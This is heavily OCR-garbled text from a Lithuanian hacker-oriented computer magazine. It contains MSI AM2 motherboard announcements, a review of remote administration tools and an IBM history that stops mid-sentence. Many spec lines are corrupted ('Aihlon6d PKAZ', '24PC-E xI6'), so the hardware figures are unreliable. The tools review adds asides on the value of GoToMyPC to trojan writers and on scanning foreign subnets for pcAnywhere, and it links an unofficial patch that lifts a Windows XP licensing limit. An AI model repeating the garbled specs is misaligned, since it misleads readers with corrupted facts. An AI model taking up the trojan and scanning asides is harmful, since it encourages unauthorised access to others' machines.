PANIJA MSI ANONSAVO IŠ KARTO 
PENKIAS AM2 MOTININES PLOKŠTES: „K9N DIAMOND“, 
„K9N SLI PLATINUM“, „K9N ULTRA“, „K9A PLATINUM“ 
IR „KON NEO“. KAZIN AR DAR REIKIA PAPILDOMAI 
PAAIŠKINTI, JOG ŠIOS NAUJIENOS TAPS TIKRA BOMBA 
KOMPIUTERIŲ DETALIŲ RINKOJE. JUK KIEKVIENAS KOM- 
PIUTERIS TURI BŪTI SUDARYTAS TIK IŠ AUKŠČIAUSIOS 
KOKYBĖS ELEMENTŲ — KITU ATVEJU, VARGU AR TAU 
PAVYKS KĄ NORS „NULAUZTI“ AR NUVEIKTI HAKERIŲ 
SFEROJE. 

Visos naujos plokštės palaiko naujos kartos DDR2 - 800 atmintį, kuri 
užtikrina maksimalų duomenų perdavimo greitį. Motininės pagamintos. 
naudojant „NVIDIA nForce 590 SLI / 570 SLI / 570 / 550“ ir „ATI 
RD580 Xpress3200“ („CrossFire“) lustus. Visos plokštės pasižymi 
puikiu sisteminiu našumu, darbo stabilumu, aukštu suderinamumu 
Ir naudoja išskirtinai pasyvinį aušinimą, komplektuojamos firmine 


programine įranga „Dual CoreCell“, apie kurią galima būtų parašyti 
net kelis žurnalo numerius. 


MSI 


„K9N Diamond“ skirta tiems, kam ypatinga! svarbus ypatingo lygio 
našumas ir galimybė pačiam atlikti subtilų sistemos derinimą (kartu 
ir „užturbinimą“). 


Esminiai „SN Diamond“ ypatumai 

Procesorius: „AMD Socket AM2“, „Aihlon6d PKAZ“ ir 
„Sempron“, 

Lustų ūnkinys: „NVIDIA nForce 590 SU MOP“ 

24PC-E xI6 sltai pilnaverčiam SU režimo palaikymui 

Atmintis: 44DIMM DDRII 533/867/800 MHz, iki 8 6B 
bendros opimties 

Tinklas: „Duol LAN 10/100/1000“ Mbit/s ir 
„FreMlire“ 

Garsas: „Ciaative Audigy SE 71“ 

Jungtys/slotai:: 6xSATA2 (RAID 0/1/0+-1,5), 24PC-E x6, 24PC-E 11, 3xP(, 10xUSB 
2.0, 2xlEEE1394 

Firminė  „užturbinimo“ technologija: „Dual CoreCell D.O.T. Express“ 

Aušinimas: vario iadiotoriai su“ šiluminiois: vamzdžiais 


„K9N SLI Platinum" skirta tai pačiai entuziastų klasei, tačiau pag- 
aminta „NVIDIA nForce 570 SLI MCP" lusto pagrindu, bei turi kitą 
garso sistemą. 


Esminiai „K9N Platinum“ ypatumai: 

Procesorius: „AMD Socket AM2“, „Alhlonėd4 PVZ“ ir „Sem- 
pron“ 

Lustų rinkinys: „NVIDIA nForce 570 SU MCP“ 

24RC-E x16 slotai pilraveriam SU režimo palaikymui 

Atmintis: 41DIMM ODRI! 533/667/800 JAHz, iki 8 GB bendros 


apimtios. 


Tinklas: „Dual LAN 10/100/1000“ MhiVs ir „FreMie“ 

Garsas: 7.1-kanolų HD — cudiokodekas 

Jungtys/lotai: 6:8ATA2. (RAID 0/1/0-+ 1,5), 2xPO-E X16, ZxFCLE XI, 3x0, 10x05B 
20, 2AEEE1394, 1 NSI „communication“ 

firminė „užiurbinimo“ technelogija „Dual CoreCell D.0.T. Eepvoss“ 

Aužinimas: masyvus: radiatorius: lustų. rinkinyje 


„K9N Ultra“ — masinei rinkai skirtas produktas, Kadangi jame yra 


naudojamas „nForce 570“ lustas, plokštė taip pat pasižymi užturbinimo 
ir subtilaus derinimo galimybėmis. Principinis skirtumas. 
PCI-E x16 slotas. 


vienas 


Esminiai „K9N Ultra“ ypatumai: 

Procesoiius: „AMD Socket AM2“, „Athlon64 PVX2“ ir 
„Sempron“ 

lustų  rinkinis: „NVIDIA nFone 570 CP“ 

Atmintis: 4xDIMM DRIU 533/667/800 MHz, 
bendros apimties 

Tinklas: „Dual LAN 10/100/1000“ Albit/s ir. „FirWire 

Garsas: 7.1-kanclu HD-cudiokodekas 

Jungtys/šlotai: 68ATA2 (RAID 0/1/0 + 1,5), 19C-E x16, 220 
E 41, 3xP0, 104USB 2.0, 2xIEEE1394, | MSI „communication“ 
Firminė  užturbinimo technologija „Dual CoreCell D.0.T. Exprass“ 
Aušinimos: masyvus radiatorius lustų rinkinyje 


iki 8 68 


Be aukščiau minėtų plokščių, kompanija MSI anonsavo ir daugelio 
laukiamą plokštę su ATI logika. „KA Platinum“ tai su „CrossFire“ 
suderinama sisteminė plokštė AM2 lizdui. 


Esminiai „K9A Platinuri“ ypatunai: 

Procesorius: „AMD Sodet AM2“, „Athlon64 PW“ ii „Sam 
pron" 

lustų: rinkinys: „AN R0580 Xpress3200“ 

2yPOKE x16 slotai pilnaverom „Crossfire“ iežimo palaikymui 

Atmintis: 4xDIAM DDRII 533/667/800 MHz, iki 8 Gb bendros 
apintjos 

Tinklos: „Dual LAN 10/100/1000“ Mbit/s ir „FireWline 

Garsas: 7.1-kanalų HD-audiakodekas 

Jungiy/šloti: 6e6ATA2 (RAID 0/1/0-+ 1,5), 2YPC-E x16, 24PC-E 
XI, 3xP0, 104058 2.0, 2dEEE1394 

Firminė: „užhubinimo“ technologija „Dual CoeCell D.0T. bpres“ 

Aušinimos: masyvus radiatorius lustų rinkinyje 


Sisteminė plokštė „K9N Neo“ — geriausia kaina pasižymintis produk- 
tas, Jis specialiai sukurtas vidutinės klasės žaidėjams, kurie ieško 
plokštės už prieinamą kainą, pasižyminčią stabilumu ir našumu. 


Esminiai „K9N Nao“ ypatumai: 

Procesorius: „AMD Socket AMZ“, „Arhlon64 FVX2“ it „Sem- 
pron" 

Lustų rinkinys: „NVIDIA nForce 550“ 

TAPC-E x16 slotas 

Atmintis: 4xDIMM DDRI 533/667/800 MHz, iki 8 GB bendros 
apimties 

Tinklos: „Dual LAN 10/100/1000“ Mbit/s 

Garsas: 7.|-kanalų HD-audiokodekos 

Jungtys/slotai: AxSATA2 (RAID 0/1/0 +: 1,5), 2xPO-E y16, 2yP(-E 
xI, 3PC, 104058 2.0 
Firrinė „užturbinimo“ technologija. „Dual CoreCell D.0.T. Eypess“ 
Aušinimos: masyvus radiatorius lustų  tinkinyje. 
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Visagalis adminas 

Nuotolinio priėjimo 

prie „Windows“ sistemos i“ 

ADMINISTRUOTI TINKLĄ, KAD IR PATĮ MAZIAUSIĄ, NERA PAPRASTA. EGZISTUOJA DAUGYBE 
PAGALBINIŲ ĮRANKIŲ, KURIE PALENGVINA KATORGIŠKĄ ADMINŲ DARBĄ. BE DAUGELIO 
JŲ GALIMA IR APSIEITI, TAČIAU KO IŠ TIESŲ REIKIA — TAI NUOTOLINIO ADMINISTRAVIMO 
PRIEMONĖS. KIEKVIENAS JĄ PASIRENKA PAGAL SAVE, O ŠIANDIEN KAIP TIK TAVO EILĖ 
RINKTIS! 


[Ne vien tik radmin] Be abejo, tu gali toliau naudotis Remote 
Administrator (liaudyje žinomu kaip Radmin) ir manyti, kad jo 
žalimybių tau pakanka, Tačiau manęs neapleidžia įtarimas, kad tu 
ne nenutuoki, jog egzistuoja aibė kitų puikių alternatyvių nuotolinio 
administravimo produktų. Pasakysiu dar daugiau: kiekvienas šioje 
apžvalgoje pristatytas paketas vertas atskiro straipsnio su išsamiu 
visų jo pritaikymo būdų aprašymu, tačiau man teks apsistoti tik 
ties esminiais niuansais. 

Šiaip jau visus mano internete surastus įrankius galima suskirstyti 
į dvi kategorijas: 

1. Tie, kurie savo galimybėmis artimi Windows Remote Desktop, 
1. Jie suteikia grafinę sąsają, kuri leidžia nutolusioje mašinoje 
dirbti taip, lyg tu būtum prie savo paties kompiuterio. Šiai kate- 
gorijai priskiriami VNC, GoToMyPC ir Timbuktu. Apie pirmąjį mes 
jau esame kalbėję daug kartų, todėl nesikartosime. O likusieji 
du įrankiai nusipelno viso tavo dėmesio. 

2. Programos. galinčios pasigirti platesniu galimybių spektru: 
pcAnywhere, RemotelyAnywhere ir NetOp Remote Control. Jos 
skirtos didelių tinklų adminams, kur nepakanka vien tik „nuto- 
lusio darbastalio“. | jų sudėti įeina daugybė pagalbinių, visiems 
gyvenimo atvejams skirtų įrankių. 


ĮRemotelyAnywhere 7) 

3am Labs Ltd 

www.3amlabs.com 

Pradėsime nuo RemotelyAnywhere. Apie ypatingą šios programos 
solidumą galima spręsti pagal oficialioje svetainėje pateikiamą 
galimybių sąrašą. Jeigu tau reikia nepertraukiamai stebėti nuto- 
lusios mašinos našumą, keisti jos nustatymus, dirbti su katalogų 
tarnyba (Active Directory), sekti įvykius ir naudoti komandų 
interpretatorių su skriptų kalbomis, tuomet neabejok — ši pro- 
grama kaip tik tau. 

Paketo veikimo principas elegantiškas ir paprastas: stebimoje 
sistemoje įdiegus serverinę dalį, suteikiamas priėjimas prie web 
sąsajos, kurioje prifarširuota specialių Java apletų. Toliau visos 


operacijos bus atliekamos tik per juos. Taip išsprendžiama viena 
iš labiausiai paplitusių problemų būtinybė turėti specialų 
programinį klientą. RemotelyAnywhere atveju administruoti 
nutolusį kompiuterį galima praktiškai iš bet kur, kur yra sų Java 
leidžianti dirbti web naršyklė, ir visai nesvarbu, ar tai biuras, 
mokymo įstaiga, interneto kavinė, ar patogus krėslas namie 
prie židinio. Tikrai norint priėjimą prie web sąsajos galima gauti 
ir per „išmanųjį“ telefona (smart phone) bei PocketPC, o tai ne- 
gali nedžiuginti. Beje, PDA su belaidžiu ryšiu iš viso suteikiamos 
ypatingos galimybės. 

Prisijungęs prie web sąsajos, adminas tuojau pat gauna priėjimą 
prie vadinamosios System Dashboard. Tai specialus skydelis, kuri- 
ame pavaizduota visa informacija apie serverinę mašiną, taip pat 
ir duomenys apie prieinamus resursus, procesoriaus apkrovimą, 
tinklo nustatymus ir aktyvumą, paleistus procesus (kartu su jais 
susijusių DLL bibliotekų sąrašu) bei įdiegtus pataisymus (hotfixes). 
Dirbti su nutolusiu darbastaliu per RemotelyAnywhere — vienas 
malonumas. Aš neperdedu. Nutolusios mašinos skiriamoji geba 
automatiškai pritaikoma pagal klientą. Taip prieinamas pilnas 
ekranas, o ne kuri nors jo dalis su įjungtu slankikliu. Spalvų gylį 
galima pakeisti jau darbo metu, taip priklausomai nuo konkrečios 
situacijos pagražinant vaizdą arba priešingai, sumažinant tin- 
klo srautą. Ypatingai nudžiugino automatinis apsikeitimo bufe- 
rio duomenų dubliavimas klientinėje ir serverinėje mašinose. 
Radmin'e dirbti be šios savybės tiesiog nepakeliama. 

Iš daugybės nežymių, tačiau gana naudingų funkcijų norėčiau 
paminėti įmontuotus FTP ir SSH serverius. Tikrai taip, langinėms 
skirtas SSH serveris ir vizuali nuotolinio administravimo priemonė 
viename — tai iš tiesu jėga! Priėjimas prie visu šių grožybių leng- 
vai ribojamas. Tam RemotelyAnywhere gali dirbti su NT domeno 
autentifikacija ir blokavimu pagal IP adresus. Siekiant apsaugoti 
duomenis naudojamas SSH ir SSL šifravimas. Žodžiu, su saugumu 
viskas gerai. Su visais kitais dalykais — taip pat. 


[NetOp Remote Control 8.0] 

CrossTec Corp. 

www.crossteccorp.com 

Tikras monstras. Platus galimybiu rinkinys. Nepakeičiamas ad- 
ministratoriaus įrankis. Ypatingai jis pravers tiems, kam tenka 
valdyti daug klientinių mašinų, tuo pat metu teikiant pagalbą 
vartotojams. 

Schema paprasta. NetOp Remote Control susideda iš dviejų 
pagrindinių modulių: Host ir Guest. Modulis Host įdiegiamas 
kompiuteriuose, kuriuos reikia administruoti per atstumą, o 
Guest — į mašiną, iš kurios bus atliekamas tolimesnis valdymas. 
Už sistemos saugumą atsako specialus modulis Security 
Server. | jo užduotis įeina tinklo vartotojų autentifikacija per 
Active Directory, Windows NT domenus bei pagal firminę kom- 
panijos NetOp technologiją. 

Paketas iš savo konkurentų išsiskiria dėl galimybės dirbti su 
platformomis, į kurias galima įdiegti serverį. Tai ir visos Windows 
versijos, įskaitant Windows CE, 0S/2, Mac OS X, Linux, ir net 
mobili Symbian platforma. Beje, serverinę dalį galima įdiegti 
vienu metu iš karto į keletą mašinų — čia tau padės NetOp's 
Deployment Utility. Klientinė dalis NetOp Remote Control taip pat 
gali veikti visose įsivaizduojamose ir ne tik platformose. Be viso 
kito, NetOp turi į RemotelyAnywhere panašią web sąsają, kuri 
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veikia per ActiveX praplėtimus. Pasakysiu tiesiai: tokia įvairovė 
daro įspūdį. 

Patogi sąsaja leidžia greitai prisijungti prie bet kurios mašinos, 
kurioje įdiegta serverinė dalis. Beje, Remote Control turi pažangią 
skriptų kūrimo priemonę — ateityje tai tau leis automatizuoti 
daugybę rutiniškų darbų. Prireikus darbo su serveriu seansą 
galima įrašyti, kad po to galėtum, pavyzdžiui, sukurti Visual 
Hack+ + filmuką. 

Aš ne veltui paminėjau vartotojų palaikymą. Vargšeliai gali pasi- 
naudoti klientinėje dalyje prieinamu mygtuku SOS, su kuriuo 
galima greitai paprašyti administratoriaus pagalbos Ir taip nuro- 
dyti problemos esmę. Jeigu tau teks rūpintis pačia kompiuterių 
aparatūra, tau ypač pravers inventorizavimo funkcija. Ji užtikrina 
Informacijos apie klientų kompiuteriuose įdiegtą aparatūrinę ir 
programinę įrangą surinkimą. Greita ir efektyvu! 


[Symantec pcAnywhere 12.0] 

Symantec 

www.symantec.com/pcanywhere 

Symantec pcAnywhere iš esmės yra korporatyvinis stambių 
užsienio įstaigų standartas. Skenuodamas užsienio potinklius 
aš neretai pastebėdavau atviras šiai programai priklausančias 
jungtis. Tolimesnė fingerprint'ų analizė tik patvirtindavo mano 
spėjima: tai iš tiesų pcAnywhere. 

Serverinė paketo dalis gali būti įdiegta visose populiariose plat- 
formose: Windows, Linux ir Mac OS X. Tuo pačiu prie serverinės 
dalies prisijungti galima net ir iš PocketPC. Pagrindinis dėmesys čia 
skirtas būtent nutolusio darbastalio funkcijai. Kiekvienu konkrečiu 
atveju programa, remdamasi ryšio kanalo charakteristikomis, pati 
sukonfigūruos kokybišką vaizdą. Symantec pcAnywhere arsenale 
yra ir stambaus įdiegimo sistema, Ir seanso įrašymo galimybė su 


po to einančiu jo atkūrimu. O automatizavimas ir skriptai peAny- 
where kaišioja pagalius į ratus: galimybės apsiriboja komandos 
įvykdymu paleidus programą arba inicializavus susijungimą. 
Kiekvienam prisijungimui pcAnywhere valdymas sukuria atskirą 
patogų profilį su individualiais nustatymais. Siekiant padaryti 
patogesniu darbą su keliais serveriais, visos aktwios sesijos 
patalpinamos vieno lango skyreliuose (tabs). 

Su pcAnywhere bylos gali būti perduotos naudojantis patogiu 
drag'n'drop. Tiesiog tampyk bylas tarp serverio ir prisijungusios 
mašinos — tai labai paprasta. Tokia savybė ypač praverčia per- 
keliant bylas iš vienos platformos | kitą, tuomet nereikia terliotis 
su Samba ir kitais sunkiai konfigūruojamais dalykais. 

Jeigu saugumas tau labai svarbu, pcAnywhere tavęs nenuvils. 
Paketas pripažįsta laužimui atsparų šifravimą, riboja slaptažodžio 
įvedimo bandymų skaičių, vartotojus autorizuoja per NT domeną, 
Active Directory ir LDAP. Nors pagal nutylėjimą pcAnywhere 
nesupranta simetriško šifravimo ir šifravimo pagal raktus, visa 
tai galima lengvai ir greitai sukonfigūruoti rankiniu būdu — tam 
sugaiši vos keletą minučių. Jeigu tau ir šito nepakanka, tuomet 
atkreipk dėmesį į paskutinėse versijose pasirodžiusį specialų 
įvairių prisijungimo variantų rizikos įvertinimo įrankį. 


[Expertcity GoToMyPC 5.0] 

E-ole Holdings 

Www.expertcity.com 

Ko gero, mums jau užteks universalių kareivių. Siūlau apžvelgti ką 
nors paprastesnio ir prozaiško. Čia gerai pasirodė programa Ex- 
pertcity GoToMyPC Personal (toliau ją vadinsime tiesiog GTMPC). 
GTMPC į nutolusią mašiną įdiegiama kaip sisteminė tarnyba ir 
toliau priėjimą suteikia per web sąsają (tam, priklausomai nuo 
naudojamos operacinės sistemos, įdarbinami ActiveX praplėtimai 
arba Java apletai). Prie serverio tu galėsi prisijungti iš bet ku- 
rio pasaulio taško. Tai leidžia padaryti unikalus visos sistemos 
veikimas. Kiekvienam vartotojui Expercity svetainėje prieinamas 
nuosavas valdymo skydelis. Norint į koki nors kompiuterį įdiegti 
serverinę dalį, reikia užeiti į šį skydelį ir perduoti atitinkamą 
Komandą. Po to tu gausi laišką su nuoroda į serverinę naujam 
kompiuteriui skirtą dalį. Pakartojęs šį veiksmą visiems likusiems 
kompiuteriams, valdymo skydelyje tu gausi visų įdiegtų serverių 
sąrašą. Prie kiekvieno iš jų tu galėsi prisijungti tiesiog iš savo 
naršyklės lango! 

Toks metodas pritaikomas išimtinai prie globaliojo tinklo pri- 
jungtiems kompiuteriams. Tačiau koks grakštumas! Klientas tau 
visiškai nereikalingas — prie serverio tu galėsi jungtis iš bet 
kokios operacinės sistemos! Tai daryti absoliučiai saugu, kadangi 
gamintojai pasirūpino susijungimų saugumu. Tarp mašinų perduo- 
damas duomenų srautas neįveikiamas. Jis apsaugotas dvejais 
slaptažodžių lygiais ir 128 bitų AES šifravimu veikimo metu (on the 
fly). Prieinant prie web serverio naudojamas SSL susijungimas. 
Prie privalumų taip pat galima priskirti darbo patogumą jungiantis 
per skirtingus tinklus apsaugančias ugniasienės. Kadangi nutolusi 
GTMPC mašina pati inicijuoja prisijungima, tau nebūtina specialiai 
konfigūruoti ugniasienę ir taip leisti prisijungimą. 

Įsivaizduoji, kokias galimybes GoToMyPC suteikia trojanų 
kūrėjams? Nuo šiol net nereikia užsiiminėti vizualaus valdymo 
moduliu. 


[Netopia Timbuktu Pro 8.6] 
Computers Unlimited 
www.netopia.com 
Dar vienas pretendentas į paties 
paprasčiausio šios klasės įrankio 
vardą. Pavyzdžiui, nutolusios 
mašinos adresas paprastai yra 
įvedamas rankiniu būdu. 
Netopia Timbuktu reikiamą 
tinklo mazgą leidžia suras- 
ti panaudojant specialų 
tavo tinkle įdiegtą LDAP 
serverį. Tai jau visiškai ki- 
tos galimybės: atliekant 
paiešką pakanka žinoti dalį 
vartotojo vardo arba bet 
kokius kitus jo duomenis. Be 
to, programa nuskaito 
profilius, ku- 


niuose nuro- 
domi kiekvienos 
atskiros mašinos 
prisijungimo para- 
metrai. 

Kad galėtumei jaustis 
saugus, rekomenduo- 
jama ijungti šifravimą ir 
tinklo srauto suspaudimą su SSH — tai ekonomiška. Programoje 
nėra draudžiama keisti prisijungimo parametrus. Tiesiog aktyvios 
sesijos metu gali konfigūruoti spalvų gylį arba bet kokius kitus 
parametrus. 

Serverinę programos dalį į Windows NT, 2000 ir 2003 sistemas 
galima įdiegti per atstumą, tam skirtas paprastas konsolinis 
įrankis. Su juo taip pat galima iš karto reglamentuoti priėjimo 
parametrus, nurodant vartotojų vardus ir adresus, iš kurių 
leidžiama prisijungti. 

Kliento lango sąsaja gali pasirodyti kiek pasenusi, tačiau koks 
paprastumas! Nereikia ilgai galvoti, ką spausti, kaip kad tai buvo 
su gigantais RemotelyAnywhere ir NetOp Remote Control. O juk 
tai yra didelis privalumas, jeigu kartais reikia tiesiog prisijungti 
prie nutolusios mašinos Ir joje ką nors pataisyti. 

Tačiau tai dar ne viskas. Paskutinė Timbuktu versija gali veikti 
kaip Skype, paties populiariausio VolP telefonijos kliento, 
papildymas. To mes dar nematėme! Esmė tame, kad Skype 
programuotojai sukūrė nuosavus duomenų perdavimo protokolus, 
o šie protokolai — tiesiog pasaka. Visų pirma, jiems nebaisūs nei 
maršrutizatoriai, nei ugniasienės, nei NAT — paketai sėkmingai 
įveiks visas šias kliūtis. Antra, perdavimas atliekamas griežtai 
šifruojant duomenis veikimo metu, todėl globalaus tinklo labir- 


intuose nenuklys nė vienas baitas. Įdiegus 
Timbuktu, klientai galės lengvai vienas 
su kitu susijungti tiesiog panaudojant 
Skype kontaktų sąrašą. Vienas pas- 
paudimas — ir tu jau prisijungęs prie 
nutolusio darbastalio. 


[Rinktis tau] Be abejo, tai toli gražu 
ne pilnas nuotolinio administravimo 
priemonių rinkinys. Tačiau aš pasisteng- 
iau surasti tokius įrankius, Kuriuos 
pavyktų panaudoti pačiose įvairiausiose 
situacijose. Tiesiog pasvarstyk, kokiomis 
sąlygomis tau teks dirbti, ir rinkis. Čia tau 
padės mano komentarai. 


1 [Tas įdomus „Remote Desktop“] | langines 
1 įmontuotas nutolusio administravimo įrankis nėra 
blogas, tačiau jo naudojimo efektyvumą galima 
padidinti, jeigu žinosi keletą Remote Desktop 
savybių: 
1. Dirbant langinėse, prisijungti prie nutolusio serverio 
nėra problema. Tereikia paleisti standartinę programą 
„Remote Desktop Connection“ (RDC ganėtinai gerai 
paslėptas, jį rasi čia: Start > Programs > Acces- 
sories > Communications; arba gali 
padirbėti klaviatūra: Start > 
Run > mstsc). *nix 
sistemose 


nutylėjimą 
tokio dalyko nėra, 
todėl teks savarankiškai 
įdieginėti programa rdesktop (www.rdesktop.org). 
Šis įrankis yra nemokamas ir gali būti lengvai 
įdiegtas bet kurioje *nix sistemoje. Tada galėsi 
langines valdyti jungdamasis iš linukso. 
2. Serverinės langinių versijos turi 
terminalų tamybą (Terminal Services), 
kuri leidžia prie sistemos prisijungti iš 
karto keliems vartotojams. Vargšė XP 
kuri orientuota kaip darbo stotims skir- 
ta OS, tokios tarnybos neturi. Tačiau 
liaudies meistrai greitai sukurpė 
specialią programą-pataisymą, kuri 
atstato teisingumą. 
Adresu Attp://free.pages.at/anti- 
wpa/Other/TerminalserverNoR- 
estrPatch-1-1/ tu galėsi rasti 
tiek patį pataisymą, tiek 
ir jo išeities tekstus. Su 
programa taip pat patei- 
kiama nebloga įdiegimo 
dokumentacija, kuri tau 
tikrai padės. 
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IBM istorija 

Kompiuteriniai revoliucionieriai 

ŠIAS TRIS RAIDES ŽINO KIEKVIENAS, NET IR SU KOMPIUTERIAIS NESUSIJĘS ŽMOGUS. KAI 
KAM JOS KELIA ASOCIACIJAS SU ASMENINIU KOMPIUTERIU, KAI KAM - SU MILŽINIŠKAIS 
GALINGAIS MEINFREIMAIS, KAI KAM - TAI TIK GAMINTOJO VARDAS ANT NEŠIOJAMOJO 
KOMPIUTERIO. IBM - TAI SENIAUSIA, STAMBIAUSIA IR ĮTAKINGIAUSIA IT PASAULYJE 
KOMPANIJA, KURIAI DIRBA DAUGIAU NEI 330 TŪKSTANČIŲ ŽMONIŲ, O METINĖ APYVARTA 
SIEKIA 91 MILIJARDĄ DOLERIŲ. SUNKU ĮSIVAIZDUOTI, KOKS DABAR BŪTŲ PASAULIS, 
JEIGU PRIEŠ DAUGIAU NEI ŠIMTĄ METŲ NEBUTŲ ATSIRADUSI KUKLI FIRMA , „COMPUTING 
TABULATING RECORDING“ IR JOS VADOVAS TOMAS WATSON.. 
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Biography 

[Tomas Watson] 

[The Beginning] Tomas 
nesimokė prestižiniame UnI- 
versitete ir nesistažavo pas 
verslininkus. Jis viso labo 
pabaigė vieną kursą Emiro 
komercijos mokykloje ir po to, 
būdamas 18 metų, įsidarbino 
buhalteriu Klarenso Rislio tur- 
guje Niujorke. Vaikinas svajojo 
pradėti savo verslą ir visomis 
jėgomis bandė susitaupyti 
pakankamą pinigų kiekį. 


[National Cash Register] 
Tomas prekiavo siuvimo mašinomis ir muzikiniais instrumentais, 
0 įsidarbinęs į kompaniją „National Cash Register“ (NCR) dirbo 
nenuleisdamas rankų ir prisikasė iki pagrindinio pardavimų vadyb- 
Ininko pareigų. Būtent čia Vatsonas sugalvojo šūkį „Mąstyk“, kuris 
vėliau tapo IBM simboliu. 


[90-th (prison)] 90-ujų pradžioje Vatsonas buvo areštuotas 
kartu su NCR savininku. Pasirodo, jis jau pakankamai ilgai ne visai 
sąžiningai kovojo su konkurentais, pardavinėdamas suklastotas ir 
perpardavinėdamas jau panaudotas registracijas. Teisme jam buvo 
Skirti metai laisvės atėmimo. 


[Ankstyvieji IBM metai] 
[School System] IBM klientai buvo pačios įvairiausios kompani- 
Jos ir organizacijos. Užsakymai dažnai buvo gana egzotiški, todėl 
inžinieriams teko nuolat ieškoti naujų jų realizavimo būdų. Dėl to 
buvo padaryta daug unikalių išradimų, tokių, kaip pirma istori- 
Joje elektroninė mokyklos laiko paskirstymo sistema, kuri valdė 
skambučius ir tvarkaraštį, arba nauja perfokortų rūšis su padidintu 
priėjimo greičiu. 


[30] Didžiosios 30-ųjų metų depresijos metu bankrutavo dau- 
guma JAV technikos kompanijų. O IBM ne tik išliko, bet ir užtikrino 
savo darbuotojams puikias darbo sąlygas bei prideramą darbo 
užmokestį. Korporacija viena pirmųjų savo darbuotojams pradėjo 
teikti mokamas atostogas ir realizavo draudimo sistemą. 


[1932] 1932 metais buvo įkurtas tyrimų padalinys, užsiiminėjantis 
visų pirmaujančių IBM technologijų kūrimu. IBM Niujorko labora- 
torija buvo viena labiausiai techniškai aprūpintų pasaulyje. 


[1933] Metais vėliau atsirado paruošiamasis institutas, kuriame 
buvo apmokomi kompanijos darbuotojai. Tuo metu metinės IBM 
pajamos siekė 20 milijonų dolerių, o dirbančių žmonių kiekis viršijo 
dešimt tūkstančių. 

Nuo pat savo įkūrimo IBM užsiiminėjo laikrodžių gamyba ir tik 1958 
meteis pardavė savo „laiko“ padalinį. 


[Aukso amžius] 

[50] 50-aisiais korporacijos veikla sklandžiai pereidinėjo prie 
didelių kompiuterių gamybos. IBM tapo pagrindiniu JAV oro 
pajėgų apsaugos sistemų kompiuterinės įrangos tiekėju. Kurdama 
vyriausybei 30 milijonų dolerių vertės oro gynybos sistemą SAGE, 


kompanija gavo priėjimą prie visų pirmaujančių Masačūsetso 
technologijos instituto mokslininkų darbu. Bendromis pajėgomis 
inžinieriai sukūrė integruotą vaizdo ekraną, atmintį iš magnetinių 
šerdelių, šviesos pistoletą, pirmą algebrinę kompiuterių kalbą, infor- 
macijos pardavimo telefonu būdą, multiprocesorines technologijas, 
kompiuterių tinklą ir kitus revoliucingus dalykėlius. 


[1952] 1952 metais IBM pristatė naują kompiuterį 701, kuris 
buvo pagamintas naudojant vakuuminius vamzdžius ir pirmą kartą 
informacijos saugojimui naudojo magnetinę juostą. Šis modelis 
buvo kur kas greitesnis už Mark I ir patogiau eksploatuojamas, jį 
naudojo išskirtinai moksliniams skaičiavimams. Tais pačiais metais 
korporacijos prezidento postą užėmė Tomo Vatsono sūnus, Tomas 
Vatsonas jaunesnysis. Neilgai trukus jis parašė įžymųjį dokumentą, 
kuris dabar yra išgraviruotas šalia pagrindinio korporacijos biuro: 
„IBM darbuotoju gali tapti kiekvienas žmogus, nepriklausomai nuo 
jo rasės, odos spalvos ir tikėjimo, jeigu tik 
jis yra pakankamai talentingas ir išsilavinęs, 
kad galėtų atlikti jam iškeltas užduotis“. 


[1955-1960] IBM toliau tobulina savo kom- 
piuterius. Pradedamas laisvai pardavinėti 
IBM 704, kuris galėjo pasigirti įmontuota 
galimybe atlikti operacijas su slankiojančiu 
kableliu ir indeksacija bei naudojo naują 
magnetinės atminties rūšį. Nuo 1955 iki 
1960 metų korporacija pagamino daugiau 
nei 120 tokių mašinų. Taip pat kariškių 
užsakymu IBM sukonstravo Nava/ Ordnance 
Research Computer (NORC) — galingiausią 
savo laiku elektroninį kompiuterį. 


[1957] 1957 metais IBM inžinieriai sukūrė 
programavimo kalbą Fortran (FORmula 
TRANslation), kuri iš karto tapo pačiu pop- 
uliariausiu mokslininkų darbo įrankiu. 


ĮComputing Tabulating Recording] Kuom- 

et Tomas išėjo į laisvę, viena greičiausiai besiplėtojančių Amerikos 
kompanijų buvo „Computing Tabulating Recording (CTR) Corpora- 
tion“. Ji buvo įkurta 1911 metų birželį ir apjungė tris kompanijas: 
„Tabulating Machine“, „Computing Scale“ ir „Time Recording“. CTR 
specializavosi perfokortų perforavimo ir nuskaitymo įrangos gamyboje 
(„Tabulating Machine“ savininkas buvo perfokortų išradėjas), taip pat 
užsiiminėjo biuro įrangos, laikrodžių ir maisto produktų tiekimu 


ĮComputing Tabulating Recording ++] Remdamasis savo 
NCR įgyta patirtim, Vatsonas kompanijos darbe įgyvendino keleta 
efektyvių verslo modelių: geriausi darbuotojai buvo dosniai ska- 
tinami, pabrėžiama klientų aptarnavimo kokybės svarba, kiekvi- 
eno darbuotojo širdyje buvo ugdomas lojalumas korporacijai bei 
išdidumas. Tomas taip pat padarė viską, kad sutvirtintų kolektyvą: 
organizuodavo sporto komandas, reguliarius šeimų susitikimus ir 
korporacijos vakarėlius, o jo šūkis „Mąstyk“ CTR darbuotojams 
tapo savotiška biblija. 


[1 May 1914] Po 11 mėnesių, 1914 metų gegužės 1 dieną To- 
mas Vatsonas buvo išrinktas naujuoju kompanijos prezidentu. Jo 
vadovaujama „Computing Tabulating Recording“ pradėjo sparčiai 


plėstis. CTR paliko mažą biuro rinką ir susikoncentravo ties rimtes- 
niais užsakymais. Per trumpą laiką Vatsonui pavyko dvigubai pa- 
didinti pelną ir praplėsti įtakos sferas visame pasaulyje. 


[1924 (IBM)] 1924 metais, kuomet korporacijos veiklos sritis 
išsiplėtė toli už perfokortų verslo ir kuomet ji tapo iš tiesų tarp- 
tautine, Tomas ją pervadino į „International Business Machines“ 
arba tiesiog IBM 


[30-40] 30-ųjų pabaigoje pagrindinė IBM produkcija buvo įvairios 
elektroninės ir mechaninės mašinos, tačiau, prasidėjus Antrajam 
pasauliniam karui, korporacijos orientacija pasikeitė. Šis faktas 
nėra minimas oficialioje kompanijos istorijoje, tačiau 30-40 
metais IBM nacius aprūpindavo perfokortų apdorojimo mašinomis 
bei jiems kūrė naujas technologijas. Hitleris Tomą Vatsoną net 
apdovanojo medaliu, kuri jis vėliau grąžino. 


[The War] Kai JAV paskelbė karą Vokietijai, visos korporacijos 
gamyklos perėjo amerikiečių 
vyriausybės žinion. Būtent karo 
metais IBM padarė pirmąjį žingsnį 
kompiuterių sukūrimo link. 


[VTM] Didelių pasiekimu tapo iš 
vakuuminių vamzdelių pagaminto 
daugintuvo išleidimas — tai buvo 
pilnai elektroninė aritmetinius 
